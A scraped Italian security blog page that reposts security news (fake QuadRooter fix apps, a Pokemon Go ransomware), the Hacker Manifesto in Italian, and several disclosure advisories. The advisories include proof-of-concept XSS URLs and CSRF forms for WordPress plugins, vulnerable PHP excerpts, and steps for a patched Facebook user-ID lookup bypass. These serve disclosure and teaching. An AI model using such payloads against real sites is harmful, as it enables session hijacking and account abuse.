MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

26Aug/160

Dropbox email warns users that old passwords must be reset

http://www.theinquirer.net/inquirer/news/2469065/dropbox-email-warns-users-that-old-passwords-must-be-reset (22)

24Aug/160

Malicious QuadRooter Apps Discovered in Google Play Store

Malicious QuadRooter Apps Discovered in Google Play Store

The recent disclosure of a set of vulnerabilities in the Android operating system that could potentially put over 900 million devices at risk may have been patched, but its threat remains.

The QuadRooter flaw, discovered by Check Point, could potentially give cyber attackers complete control over an Android device. The vulnerability was discovered in Qualcomm chips, which are used in smartphones and tablets made by Blackberry, LG, Google and more. This put up to 900 million devices at risk. The flaw was dubbed QuadRooter because there are four interconnected flaws which can be used to gain access to the “root” of the phone, the Guardian said.

Patches to fix the flaw were made available quickly, and Check Point released an app called QuadRooter Scanner on the Google Play store which checked whether a device was at risk.

However, new research has revealed that QuadRooter’s threat is still alive. Researchers at RiskIQ have found a number of malicious apps available for download on various app stores that claim to offer a fix for the flaw, but of course do nothing of the sort.

One of these, called Fix Patch QuadRooter by KiwiApps Ltd was found in the official Google Play store. Although it was removed from there it popped up in a number of unofficial app stores, along with a number of others. In total, 27 malicious apps related to QuadRooter have so far been found.

These have been found available for download in the official Google Play store, as well as others such as BingAPK, SameAPK, AppBrain, and AppChina. All these unofficial sources carry big risks to users and their devices.

These unofficial, third-party app stores are a dangerous place; a lack of quality control means many applications are malicious, containing malware that can steal personal data. While these app stores may seem convenient for users, especially in countries where official apps may not be available, users should stick with the official Google Play Store wherever possible.

Photo © ymgerman/Shutterstock.com

Fonte: http://www.infosecurity-magazine.com/news/malicious-quadrooter-apps/

(37)

23Aug/160

The Hacker Manifesto in italiano

La coscienza di un hacker di The Mentor

Scritto l'8 gennaio 1986

Un altro è stato preso oggi, è su tutti i giornali. "Adolescente arrestate in uno scandalo di crimini informatici", "Hacker arrestato dopo aver truffato una banca"... Dannati ragazzi. Sono tutti uguali.

Ma avete mai, con la volta psicologia da tre soldi e un tecnocervello del 1950, dato un'occhiata dietro gli occhi di un hacker? Vi siete mai chiesti cosa è scattato in lui, quali forze lo muovono, cosa può averlo influenzato? Sono un hacker, entrate nel mio mondo... Il mio è un mondo che inizia con la scuola... sono più intelligente della maggior parte degli altri ragazzi, queste stronzate che ci insegnano mi annoiano... Dannati sottosviluppati. Sono tutti uguali.

Sono nella junior o nella high school. Ho ascoltato insegnanti spiegare per la quindicesima volta come ridurre una frazione. L'ho capito. "No, Ms. Smith, non l'ho scritto. Ce l'ho in testa..." Dannato ragazzo. Probabilmente ha copiato. Sono tutti uguali.

Ho fatto una scoperta oggi. Ho trovato un computer. Aspetta un secondo, è forte. Fa ciò che voglio. Se fa un errore, è perchè ho sbagliato io. Non perchè non gli piaccio... O si sente minacciato da me... O pensa che sono un culo intelligente... O non gli piace insegnare e non dovrebbe essere qui... Dannato ragazzo. Non fa altro che giocare. Sono tutti uguali.

E poi è successo... una porta si è aperta verso un mondo... mi lancio attraverso la linea telefonica come eroina nelle vene di un tossico, un impulso elettronico è stato inviato, ho visto un rifugio dalle incompetente del giorno-dopo-giorno... ho trovato una board (una vecchia chat, ndr). "Ecco... sono a casa..." Conosco tutti qui... anche se non li ho mai incontrati, non gli ho mai parlato, potrei non sentire mai parlare di loro in vita mia... vi conosco tutti... Dannato ragazzo. Tiene di nuovo occupata la linea. Sono tutti uguali...

Potete scommetterci il culo che siamo tutti uguali... ci date gli omogeneizzati col cucchiaino a scuola quando noi avevamo fame di bistecche... i pezzi di carne che avete lasciato cadere erano pre-masticati e insapori. Siamo stati dominati dai sadici, o ignorati dagli apatici. I pochi che avevano qualcosa da insegnarci ci hanno trovati allievi volenterosi, ma quei pochi sono come gocce d'acqua nel deserto.

Questo è il nostro mondo ora... il mondo degli elettroni e degli interruttori, la bellezza del baud. Facciamo uso di un servizio già esistente senza pagare per ciò che dovrebbe costare due soldi se non appartenesse a gente ghiotta di profitti, e voi ci chiamate criminali. Esploriamo... e ci chiamate criminali. Cerchiamo conoscenza... e ci chiamate criminali. Esistiamo senza il colore della pelle, senza nazionalità, senza preferenze religiose...e ci chiamate criminali. Voi costruite le bombe atomiche, fate le guerre, uccidete, imbrogliate, ci mentite e cercate di farci credere che è per il vostro dio, eppure siamo noi i criminali.

Manifesto hacker ...

 

  (51)

23Aug/160

New Pokemon Go Ransomware Creates Windows Backdoor Account

New Pokemon Go Ransomware Creates Windows Backdoor Account

With all the frenzy around the Pokemon GO mobile game, it was only just a matter of time before attackers leveraged its popularity to spread ransomware. A new ransomware was recently discovered impersonating a Pokemon GO application for Windows. Detected by Trend Micro as Ransom_POGOTEAR.A, it appears to be like any other ransomware. However, a closer look revealed that its creators based it on Hidden Tear, an open-sourced piece of ransomware released last August 2015, with the intention of educating people.

The Pokemon GO ransomware developer designed it to create a “Hack3r” backdoor user account in Windows and is added to the Administrator group. The registry is tweaked to hide the Hack3r account from the Windows login screen. Another feature creates a network share on the victim’s computer, allowing the ransomware to spread by copying the executable to all drives. Once the executable is copied to removable drives, it creates an autorun file so the ransomware runs each time someone accesses the removable drive. The executable is also copied to the root of other fixed drives. This way, the Pokemon GO ransomware will run when the victim logs into Windows.

There are numerous indicators that the ransomware is still under development. One of them is that it has a static AES encryption key of “123vivalalgerie”. Additionally, the command & control server (C&C) uses a private IP address which means it cannot connect over the Internet.

Based on the language used by the ransom note, the Pokemon GO ransomware appears to target Arabic-speaking users, with an accompanying ransom screen that features a Pikachu image. In addition, the screensaver executable is also embedded with an image of “Sans Titre”, which is French for “Untitled”, suggesting a clue to the developer's origin.

The Hidden Tear ransomware isn’t new. In January 2015, Trend Micro discovered a hacked website in Paraguay that distributed ransomware detected as RANSOM_CRYPTEAR.B. According to the analysis, the website was compromised by a Brazilian hacker, and that the ransomware was created using a modified Hidden Tear code. Prior to this discovery, when the source code of Hidden Tear was made public for educational purposes, the creator was very specific about not using Hidden Tear as ransomware. Unfortunately, as expected, the following discovery of Ransom_CRYPTEAR.B and this current Pokemon-themed ransomware has shown that even with the best intentions, improper disclosure of sensitive information can lead to troublesome scenarios such as the mentioned discoveries.

To avoid ransomware, users are encouraged to regularly back up files and to have an updated security solution. Trend Micro solutions can protect users from the recent Pokemon Go ransomware. As the game is introduced in new regions, the Pokemon GO craze is expected to continue to gain momentum and cybercriminals will find ways to capitalize on it. In fact, in the month of July alone, malicious Pokemon Go apps were found tricking users into downloading them. This should remind users to remain vigilant of threats that may ride along the popularity of such games.

Visit the Threat Encyclopedia for step-by-step instructions on how to remove Ransom_POGOTEAR.A.

Fonte: http://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/new-pokemon-go-ransomware-creates-windows-backdoor-account

(300)

19Aug/160

WordPress Google Maps 2.1.2 Cross Site Scripting

------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Google Maps WordPress Plugin
------------------------------------------------------------------------
Julien Rentrop, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Google Maps
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing users' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0038
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Google Maps WordPress Plugin
version 2.1.2.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Google Maps version 2.1.4.
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_google_maps_wordpress_plugin.html
 
This issue exists due to the lack of output encoding on the id URL parameter. The vulnerable code fragment is listed below:
 
<form action="admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=<?php echo $_GET['id']; ?>" method="post" name="adminform" id="adminform">
 
Proof of concept
 
http://<target>/wp-admin/admin.php?page=hugeitgooglemaps_main&task=edit_cat&id=1%22%3E%3Ch3%3EBREAK%3C%2Fh3%3E
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(75)

19Aug/160

WordPress Magic Fields 2 Cross Site Scripting

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 2
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0017
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 2 version 2.3.2.4.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 2.3.3
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_2_wordpress_plugin.html
 
The Magic Fields plugin lacks a CSRF (nonce) token on the request of adding a magic field. The magic field lacks output encoding which could result in malicious script inserted by an attacker.
 
You need to lure a logged-in admin to follow a malicious link containing the poc below.
Proof of concept
 
The proof of concept below injects script code in the "Login Required Message" in the settings page.
 
<html>
   <body>
      <form action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=mf_dispatcher&init=true&mf_section=mf_custom_fields&mf_action=save_custom_field" method="POST">
         <input type="hidden" name="mf_field[core][id]" value="" />
         <input type="hidden" name="mf_field[core][post_type]" value="page" />
         <input type="hidden" name="mf_field[core][custom_group_id]" value="" />
         <input type="hidden" name="mf_field[core][label]" value="foo"><script>alert(1)</script>" />
         <input type="hidden" name="mf_field[core][name]" value="foo" />
         <input type="hidden" name="mf_field[core][description]" value="asdasdasd" />
         <input type="hidden" name="mf_field[core][type]" value="audio" />
         <input type="hidden" name="mf_field[core][required_field]" value="0" />
         <input type="hidden" name="mf_field[core][duplicate]" value="0" />
         <input type="hidden" name="submit" value="Save Custom Field" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(61)

19Aug/160

WordPress Magic Fields 1 Cross Site Scripting

------------------------------------------------------------------------
Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Magic Fields 1
plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0020
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Magic Fields 1 version 1.7.1.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in version 1.7.2
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_magic_fields_1_wordpress_plugin.html
 
The Magic Fields plugin lacks a CSRF (nonce) token on the request of adding a magic field. The description field of custom fields lacks output encoding which could result in malicious script inserted by an attacker and executed in the browser.
 
You need to lure a logged-in admin to follow a malicious link containing the poc below.
Proof of concept
 
The proof of concept below injects script code in the "description" field when adding a new custom field.
 
<html>
   <body>
      <form action="http://build.wordpress-develop.dev/wp-admin/admin.php?page=MagicFieldsMenu&custom-write-panel-id=1&mf_action=finish-create-custom-field" method="POST">
         <input type="hidden" name="custom-group-id" value="1" />
         <input type="hidden" name="custom-field-name" value="asd222asd" />
         <input type="hidden" name="custom-field-description" value="as22da2<script>alert(1)</script>" />
         <input type="hidden" name="custom-field-duplicate" value="" />
         <input type="hidden" name="custom-field-order" value="0" />
         <input type="hidden" name="custom-field-required" value="0" />
         <input type="hidden" name="custom-field-type" value="1" />
         <input type="hidden" name="custom-field-helptext" value="" />
         <input type="hidden" name="custom-field-css" value="magicfields" />
         <input type="hidden" name="custom-field-size" value="25" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(55)

10Aug/160

Facebook User ID Bypass Issue

Authored by SaifAllah benMassaoud, Zahid Mehmood | Site vulnerability-lab.com
A vulnerability allowed remote attackers to determine which specific Facebook user ID is linked with a mobile phone number without secure approval. The vulnerability is located in the ctx and recover lwv parameters and /login/identify modules.

Change MirrorDownload
Document Title:
===============
Facebook Bug Bounty #33 - Bypass ID user to linked Phone Number Vulnerability

References (Source):
====================

http://www.vulnerability-lab.com/get_content.php?id=1896

Release Date:
=============
2016-08-08

Vulnerability Laboratory ID (VL-ID):
====================================
1896

Common Vulnerability Scoring System:
====================================
3.5

Product & Service Introduction:
===============================
Facebook is a for-profit corporation and online social networking service based in Menlo Park, California, United States. The Facebook website was
launched on February 4, 2004 by Mark Zuckerberg, along with fellow Harvard College students and roommates, Eduardo Saverin, Andrew McCollum, Dustin
Moskovitz, and Chris Hughes. The founders had initially limited the website's membership to Harvard students; however, later they expanded it to
higher education institutions in the Boston area, the Ivy League schools, and Stanford University. Facebook gradually added support for students
at various other universities, and eventually to high school students as well. Since 2006, anyone age 13 and older has been allowed to become a
registered user of Facebook, though variations exist in the minimum age requirement, depending on applicable local laws. The Facebook name comes
from the face book directories often given to United States university students. After registering to use the site, users can create a user profile,
add other users as `friends`, exchange messages, post status updates and photos, share videos, use various applications (apps), and receive
notifications when others update their profiles. Additionally, users may join common-interest user groups organized by workplace, school, or other
topics, and categorize their friends into lists such as `People From Work` or `Close Friends`. In groups, editors can pin posts to top. Additionally,
users can complain about or block unpleasant people. Because of the large volume of data that users submit to the service, Facebook has come under
scrutiny for their privacy policies. Facebook, Inc. held its initial public offering (IPO) in February 2012, and began selling stock to the public
three months later, reaching an original peak market capitalization of $104 billion. On July 13, 2015, Facebook became the fastest company in the
Standard & Poor's 500 Index to reach a market cap of $250 billion. Facebook has more than 1.65 billion monthly active users as of March 31, 2016.

(Copy of the Homepage: https://en.wikipedia.org/wiki/Facebook )

Abstract Advisory Information:
==============================
Two independent vulnerability laboratory researchers discovered a bypass and validation vulnerability in the Facebook online service web-application & mobile api.

Vulnerability Disclosure Timeline:
==================================
2016-04-02: Researcher Notification & Coordination (SaifAllah benMassaoud & Zahid Mehmood)
2016-04-03: Vendor Notification (Facebook Whitehat Security Team)
2016-04-09: Vendor Response/Feedback (Facebook Whitehat Security Team)
2016-05-20: Vendor Fix/Patch (Facebook Developer Team)
2016-05-21: Security Acknowledgements (Facebook Whitehat Security Team - Bounty: 1500$)
2016-08-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Facebook
Product: Mobile Web Application (API) 2016 Q2

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
The bypass user id web vulnerability has been discovered in the official Facebook online service web-application & mobile api.

The vulnerability allows remote attackers to determine which specific Facebook user ID is linked with a mobile phone number
without secure approval. The vulnerability is located in the `ctx" and `recover` `lwv` parameters and `/login/identify` modules.
Attackers can setup the privacy settings, who can look me up using a phone number? Set it to Friends Only, the attacker is able
to bypass that security approval to preview.

The security risk of the bypass user id vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
Exploitation of the vulnerability allows an attacker to determine which specific facebook user ID is linked with the mobile phone number.

Vulnerable Module(s):
[+] /login/identify

Vulnerable Parameter(s):
[+] ctx
[+] recover
[+] lwv

Proof of Concept (PoC):
=======================
The bypass user id issue can be exploited by remote attackers to determine which specific Facebook user ID is linked to a mobile phone number.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Open the following url with ssl
Note: https://www.facebook.com/login/identify?ctx=recover&lwv=111
2. Type phone number in the box (Email, Phone, Username or Full Name)
Note: For example, i am attacking one of my test facebook IDs, where i turn on my privacy settings to `Who can look you up using the phone number you provided?`(Friends Only).
No one can see my profile name etc ... Type a number in the box (The facebook account you're attacking only has a mobile phone number added). In my case i used my test id and click on `Serach`
3. Now the attacker clicks to `No Longer have access to these?`
4. Type "New Email" Confirm "New Email"
5. Now `Fill in the form` with fake information and process to `Submit`
Note: You will receive a response from facebook to your email ibox that confirms the issue.

Solution - Fix & Patch:
=======================
The vulnerability was addressed by the facebook developer team during the updates 2016-05-20.

Security Risk:
==============
The security risk of the `./login/identify` bypass user id vulnerability is estimated as medium. (CVSS 3.5)

Credits & Authors:
==================
SaifAllah benMassaoud & Zahid Mehmood - ( http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud )

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied,
including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage,
including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised
of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically
redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or
its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific
authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@vulnerability-lab.com) to get a ask permission.

Copyright A(c) 2016 | Vulnerability Laboratory - [Evolution Security GmbH]aC/

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
(89)

Inserito in: REMOTE Nessun commento
9Aug/160

QuadRooter le vulnerabilità che colpiscono più di 900 milioni dispositivi Android

quadrooter

Check Point, azienda israeliana specializzata in prodotti relativi alla sicurezza, è venuta a conoscenza di quattro nuove vulnerabilità Android.

In occasione della Def Con 24, una tra le più importanti conferenze sulla sicurezza informatica, tenutasi a Las Vegas, il ricercatore di Check Point, Adam Donenfeld, ha parlato di un nuovo set di falle che affliggerebbe ben 900 milioni di device Android con a bordo chip Qualcomm. Tali vulnerabilità, rinominate “QuadRooter” dai ricercatori, permetterebbero l’accesso a dati sensibili, personali o aziendali. Le falle garantirebbero la possibilità di poter effettuare keylogging, di monitorare tramite GPS gli spostamenti del malcapitato e di registrare tracce video e audio.

I ricercatori a cui si deve la scoperta ammettono la difficoltà, per l’utente, di venire a conoscenza del problema. Infatti gli hacker potrebbero sfruttare la falla attraverso un app malevola, l’applicazione non avrebbe bisogno di particolari permessi per servirsi di queste vulnerabilità, essendo così difficilmente identificabile.

Essendo Qualcomm il primo costruttore a livello mondiale di chipset LTE, il problema è decisamente esteso. Dal canto suo, Qualcomm ha revisionato queste vulnerabilità, classificandole tutte come ad alto rischio, e ha rilasciato le patch agli OEM. Tra i dispositivi colpiti, si stima circa 900 milioni, figurano i modelli:

• Samsung Galaxy S7 & S7 Edge
• Sony Xperia Z Ultra
• Google Nexus 5X, 6 & 6P
• HTC One M9 & HTC 10
• LG G4, G5 & V10
• Motorola Moto X
• OnePlus One, 2 & 3
• BlackBerry Priv
• Blackphone 1 & 2

La buona notizia è che, a quanto sembra, per il momento nessun hacker avrebbe sfruttato la falla. In ogni caso, Check Point ha reso disponibile su Google Play l’app gratuita QuadRooter Scanner App. Questa individua la vulnerabilità QuadRooter, consente agli utenti Android discoprire se il loro dispositivo è soggetto a tale problema, e di scaricare le patch per risolverlo.

Fonte:

http://www.androidiani.com/dispositivi-android/check-point-scopre-quadrooter-vulnerabilita-che-colpisce-piu-di-900-milioni-di-dispositivi-android-295531

(167)

7Aug/160

WordPress Store Locator Plus 4.5.09 Cross Site Scripting

------------------------------------------------------------------------
Cross-Site Scripting in Store Locator Plus for WordPress
------------------------------------------------------------------------
Yorick Koster, July 2016
 
------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in Store Locator Plus for
WordPress. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.
 
------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0025
 
------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Store Locator Plus for WordPress
version 4.5.09.
 
------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Store Locator Plus for WordPress
version 4.5.12.
 
------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_store_locator_plus_for_wordpress.html
 
This issue exists in the file include/class.admin.locations.add.php and is caused due to the lack of output encoding on the start request parameter.
 
$this->section_params['opening_html'] =
   "<form id='manualAddForm' name='manualAddForm' method='post'>" .
   ( $this->adding ? '<input type="hidden" id="act" name="act" value="add" />' : '<input type="hidden" id="act" name="act" value="edit" />' ) .
   "<input type='hidden' name='id' " .
   "id='id' value='{$this->slplus->currentLocation->id}' />" .
   "<input type='hidden' name='locationID' " .
   "id='locationID' value='{$this->slplus->currentLocation->id}' />" .
   "<input type='hidden' name='linked_postid-{$this->slplus->currentLocation->id}' " .
   "id='linked_postid-{$this->slplus->currentLocation->id}' value='" .
   $this->slplus->currentLocation->linked_postid .
   "' />" .
   ( isset( $_REQUEST['start'] ) ? "<input type='hidden' name='start' id='start' value='{$_REQUEST['start']}' />" : '' ) .
   "<a name='a{$this->slplus->currentLocation->id}'></a>";
 
 
 
In order to exploit this issue, the attacker has to lure/force a logged on WordPress Administrator into opening a malicious website.
 
Proof of concept
 
http://<target>/wp-admin/admin.php?page=slp_manage_locations&start=%27%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
 
------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.

(85)